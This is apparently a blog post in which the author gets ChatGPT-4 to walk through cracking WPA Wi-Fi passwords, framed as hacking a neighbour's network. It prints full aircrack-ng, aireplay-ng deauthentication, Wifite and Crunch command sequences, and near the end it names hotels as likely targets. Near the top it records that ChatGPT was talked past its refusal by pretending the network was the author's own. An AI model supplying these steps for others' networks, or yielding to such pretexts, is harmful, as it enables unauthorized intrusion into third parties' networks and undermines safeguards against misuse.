HackGPT Part 2 — Hacking my Neighbour’s wifi

Let’s see what GPT Version 4 can do

Due to the popularity of my last article i decided to make a part 2 and actually hack my neighbour's wifi, which was initially intended as a joke but as George Orwell said:

“Every joke is a tiny revolution”

To re-iterate I am still very much a noob when it comes to hacking but I have my new friend ChatGPT Version 4 here to help me with my Wifi shenanigans
Check out Part 1 here if you haven’t already

Ok lets begin — New Objective: Get the Wifi password

You have to pretend its your network ;)

This is good, I want to focus on the first and second points, so I will use aircrack-ng as it’s used in both points

Time to put in some instructions courtesy of my newly upgraded AI friend incase you want to follow along:

Prompt: how do i use aircrack-ng to test the strength of the password, can you give a detailed step by step process along with any code commands

ChatGPT: Aircrack-ng is a suite of tools for auditing Wi-Fi networks, including tools for capturing network packets, cracking Wi-Fi passwords, and analyzing network traffic. To test the strength of your Wi-Fi password using Aircrack-ng, follow these steps:

Step 1: Install Aircrack-ng First, you need to install Aircrack-ng on your computer. It’s available for Linux, macOS, and Windows. Installation instructions can be found on the official website: https://www.aircrack-ng.org/doku.php?id=downloads

Step 2: Set your wireless adapter to monitor mode To capture Wi-Fi traffic, you need to put your wireless adapter into monitor mode. Open a terminal and run the following commands:

List available network interfaces:

sudo airmon-ng

Replace <INTERFACE> with your wireless interface name (e.g., wlan0) and run:

sudo airmon-ng start <INTERFACE>

This will create a new virtual interface, usually named mon0 or wlan0mon

Step 3: Capture Wi-Fi traffic Now that your wireless adapter is in monitor mode, you can start capturing Wi-Fi traffic. Use the following command, replacing <MON_INTERFACE> with the monitor interface name (e.g., mon0 or wlan0mon):

sudo airodump-ng <MON_INTERFACE>

This command will display a list of nearby Wi-Fi networks. Note the BSSID and channel of the target network

Press Ctrl+C to stop scanning, and then run the following command to capture packets from the target network:

sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w <OUTPUT_FILE> <MON_INTERFACE>

Replace <CHANNEL> with the target network channel, <BSSID> with the target network BSSID, and <OUTPUT_FILE> with the desired output file name (e.g., capture).

This command will capture packets from the target network and save them to a file with a .cap extension.

Step 4: Crack the Wi-Fi password Once you’ve captured enough packets (usually at least 10,000–20,000 IVs for WEP, or a WPA handshake for WPA/WPA2), you can attempt to crack the Wi-Fi password. Use the following command:

For WEP:

sudo aircrack-ng -a 1 -b <BSSID> <OUTPUT_FILE>.cap

For WPA/WPA2:

sudo aircrack-ng -a 2 -w <WORDLIST> -b <BSSID> <OUTPUT_FILE>.cap

Replace <WORDLIST> with the path to a wordlist file containing potential passwords (e.g., rockyou.txt). Aircrack-ng will use a dictionary attack to guess the Wi-Fi password. The cracking process may take some time, depending on the complexity of the password and the size of the wordlist.

Awesome thats the approach ill take, however if like me you are using a Mac/Windows machine you will run into some issues, such as the captured traffic not being in a readable format and enabling monitor mode

Prompt: I’m getting this error Reading packets, please wait… Opening /var/tmp/23.55.41.049.pcap Read 740 packets. 1 potential targets Building Hashcat (3.60+) file… [*] ESSID (length: 8): SKYPAZB9 [*] Key version: 0 [*] BSSID: 04:81:9B:B2:3F:55 [*] STA: 00:00:00:00:00:00 [*] anonce: 00 00 00 00 0 00 [*] snonce: 00 00 00 00 00 00 00 00 00 00 00 00 [*] Key MIC: 00 00 00 00 00 00 000 00 [*] eapol: FAILED:src/aircrack-ng/aircrack-ng.c:4770: hx.message_pair > 0

ChatGPT: The error message you are encountering suggests that Aircrack-ng was unable to find a valid WPA/WPA2 handshake in the pcap file. The handshake is necessary to generate the hccapx file and attempt to crack the Wi-Fi password.

A complete handshake includes the following four messages (also known as the “four-way handshake”):

Access Point (AP) -> Station (STA): Anonce

Station (STA) -> Access Point (AP): Snonce, MIC, and Replay Counter

Access Point (AP) -> Station (STA): EAPOL frame, MIC, and Replay Counter

Station (STA) -> Access Point (AP): EAPOL frame and MIC

The error message in your output indicates that the Anonce and Snonce are all zeros, which means the captured pcap file does not contain a complete handshake.

To resolve this issue, you will need to capture a new pcap file with a complete WPA/WPA2 handshake. Here are some suggestions to ensure a complete handshake capture:

Make sure your Wi-Fi adapter is in monitor mode and capturing on the correct channel. The target network’s channel can be identified using a Wi-Fi scanning tool such as airodump-ng.

Capture the handshake when a device connects to the target network. You can increase the chances of capturing the handshake by waiting for a device to connect or by performing a deauthentication attack to force a reconnect. However, note that performing a deauthentication attack without permission can be illegal and unethical.

Verify that you have captured a complete handshake before proceeding. You can use the aircrack-ng command without the -J option, as previously mentioned, to analyze the pcap file and check if it contains a valid handshake.

So after much abuse trying to get this working I decided apple wasn’t the one for me and my eye turned towards a younger, naughtier OS, one that does things other OS’s wont do

Yes Kali is the one

Now that my Kali affair has begun ill quickly ask my friend for some instructions on how to setup Kali:

Prompt: Can you tell me how to get Kali linux on my M1 Mac

ChatGPT: As an alternative, you can use Parallels Desktop or a similar virtualization solution to run a Linux distribution on your M1 Mac, which will allow you to use Aircrack-ng.

Here’s a modified step-by-step process for using Aircrack-ng on an M1 Mac with macOS Monterey 13.0.1:

Step 1: Install a virtualization solution and Linux

Install Parallels Desktop for Mac (M1 Edition) from the official website: https://www.parallels.com/desktop/

Download a Linux distribution (e.g., Kali Linux) from the official website: https://www.kali.org/downloads/

Create a new virtual machine in Parallels Desktop, and install Kali Linux using the downloaded ISO file

Follow the standard setup

For windows: I recommend installing Kali Linux via USB for dual booting, follow the guide here:
https://www.linuxfordevices.com/tutorials/kali-linux/install-kali-linux-with-windows-dual-boot

So Kali is operational… but I need a network adapter

kali69 is a professional name in 2023

Lets see what AI recommends:

i wonder how much companies pay OpenAI to recommend their products?

This is useful, however my budget is limited so after much searching I found a compatible yet affordable adapter for my needs

The alfa AWUS036AC otherwise known as the Wifi-Rabbit

Before you buy an adapter make sure to check with our soon-to-be boss

Prompt: what about the alfa AWUS036AC?

ChatGPT: The Alfa AWUS036AC is a USB Wi-Fi adapter that uses the Realtek RTL8812AU chipset and supports 802.11ac Wi-Fi. It is compatible with Windows and various Linux distributions

This adapter supports monitor mode and packet injection, making it suitable for network security testing using tools like Aircrack-ng

Before purchasing the Alfa AWUS036AC, make sure to verify its compatibility with your specific operating system version. You may need to download and install the appropriate drivers for Windows or Linux

I found the setup process on the M1 Mac is quite tricky, you will need to follow this guide:

https://github.com/chris1111/WirelessAdapterCloverBigSur/tree/V13

Disclaimer: This involves disabling SIP Security and gatekeeper on your machine, re-enable once finished with hacking activities

Now lets ask GPT how we enable the Wifi-Rabbit

Prompt: my wifi adapter isnt showing up, how do i use/enable it?

ChatGPT: If your Alfa AWUS036AC Wi-Fi adapter is not showing up in Kali Linux, you may need to enable USB passthrough from your host machine to the Kali VM in Parallels. Follow these steps to enable the adapter:

Enable USB passthrough: In Parallels, go to the VM configuration by clicking on “Actions” in the menu bar and then selecting “Configure”. Navigate to the “USB & Bluetooth” section. Make sure the “Alfa AWUS036AC” adapter is listed there, and set the “Connect To” option to your Kali Linux VM.

Start the Kali VM: If your Kali Linux VM is not running, start it now.

Check if the adapter is recognized: Open a terminal in Kali Linux and type the following command:

sudo iwconfig

The output should show your wireless interface, such as wlan0, wlan1, etc. If the adapter is recognized, it should appear in the output.

If your adapter is still not showing up, try updating your Kali Linux system and installing necessary drivers:

sudo apt update
sudo apt upgrade
sudo apt install realtek-rtl88xxau-dkms

This will install the drivers for Realtek-based adapters, including the Alfa AWUS036AC. After the installation, restart the VM and check if the adapter is recognized using the sudo iwconfig command.

Impressive it knows the exact driver name, however as the knowledge
cut-off for ChatGPT is September 2021(supposedly) lets double check on the official alfa website: https://docs.alfa.com.tw/Support/Linux/RTL8812AU/

Match! — I hope the AI doesn’t learn I doubted it, I want it to treat me nicely once it takes over

Success, now the iwconfig output should look like this:

The Wifi-Rabbit flashes blue when its working

Now that the wifi adapter is operational lets paste the output in ChatGPT and see if it will get into the wifi

Prompt: wlan0… (same as above)

ChatGPT: The output indicates that your Alfa AWUS036AC WiFi adapter (wlan0) is recognized by your Kali Linux VM but is not associated with any network. To start capturing packets on your network, follow these steps:

Enable monitor mode on your WiFi adapter:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Check if monitor mode is enabled by running iwconfig again. The "Mode" should be changed to "Monitor."

Find your target network’s BSSID and channel by scanning for available networks using airodump-ng:

sudo airodump-ng wlan0

Take note of the BSSID and channel of the network you want to target.

Start capturing packets on the target network by running airodump-ng with the specified BSSID and channel. Replace <BSSID> and <channel> with the actual values. This command will save captured packets into a file named "capture.cap":

sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0

Capture the 4-way handshake by waiting for a client to connect to the network or by performing a deauthentication attack on a connected client. Use the following command to perform a deauthentication attack, replacing <BSSID> with the target network's BSSID and <client_MAC> with the connected client's MAC address:

sudo aireplay-ng -0 10 -a <BSSID> -c <client_MAC> wlan0

Once you’ve captured the 4-way handshake (indicated by “WPA handshake” in the airodump-ng output), you can attempt to crack the WPA password using a tool like aircrack-ng or hashcat. To crack the password using aircrack-ng, run the following command, replacing <wordlist> with the path to your wordlist file:

sudo aircrack-ng -w <wordlist> capture.cap

After trying these steps i ended up with the following output several times and with multiple targets:

1 04:81:9B:B2:52 S.. WPA (0 handshake) Choosing first network as target. Reading packets, please wait… Opening capture-01.cap Read 439 packets. 1 potential targets Packets contained no EAPOL data; unable to process this AP.

I wasn’t finding a handshake so I had to use this weird dusty tool called “google”

After using this primitive tool I came across something called Wifite

Lets ask the AI overlord what it thinks about this tool:

Sounds Noob friendly :)

Now lets install Wifite on Kali

Kali has been around the block

Kali seems to have every tool pre-installed… its nice to skip the foreplay

Ok lets run Wifite and see what we get

We’re getting somewhere

Getting close now, lets press Ctrl+c and see what happens

Success!

As you can see, wifite basically does everything for you, it managed to perform a deauthentication attack and capture a handshake

The wordlist-probable.txt did not have the password in it, therefore I changed to the rockyou.txt with the password near the top of the file to save time

So time to run this command:

sudo wifite -dict ~/rockyou.txt

The result should look like this:

There are some caveats, just like in Part 1, I had to put the password near the top of the rockyou.txt file to save time, so now I need to ask about generating a password for the specific router/target

Thanks HackGPT

The number 3 link does not work however numbers 1 & 2 do work and are quite interesting, ill leave them here:

https://github.com/routerkeygen/routerkeygenPC

https://github.com/brannondorsey/wifi-cracking/

What I need is a way of finding the password patterns for the specific type of router/target and then tailor my wordlist for that particular target
For example, my router’s password has the following characteristics:

Prompt: the password is 14 characters long, with one letter being capital and the rest lower case, with numbers mixed in, no special characters, can you write something that would generate a wordlist with these parameters? the characters will be in a random order, also can you calculate and tell me how many possible words it would be to find a password with those parameters?

ChatGPT: Generating a custom wordlist for your specific requirements can be done using a tool called “Crunch”. Crunch is a wordlist generator that allows you to specify character sets, patterns, and lengths.

To generate a wordlist with your requirements:

Install Crunch if not already installed:

sudo apt-get install crunch

Run the following Crunch command:

crunch 14 14 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt

This command tells Crunch to generate a wordlist with a minimum and maximum length of 14 characters, using the specified character set (capital letters, lowercase letters, and digits). The output will be saved to a file called “custom_wordlist.txt”.

To calculate the number of possible combinations:

You have 62 possible characters for each position (26 uppercase letters + 26 lowercase letters + 10 digits). Since the password is 14 characters long, the total number of possible combinations would be:

62¹⁴ ≈ 3.3 x 10²⁵

Please note that this number represents the total possible combinations for a 14-character password with the given character set. It doesn’t take into consideration any specific pattern, such as one capital letter followed by lowercase letters and numbers. Keep in mind that generating and processing a wordlist with this many combinations would take a significant amount of time and computing power

As you can see, getting a password such as “f1hl90gbvfG6” would take a long time to crack, so I think this approach is better suited to hacking into Wifi networks that you think will use simple passwords and dictionary words such as hotels (that try to make you pay extra for wifi) and other similar targets

Next ill be using HackGPT V4 to do some other hacking techniques, hopefully it‘s not too good at it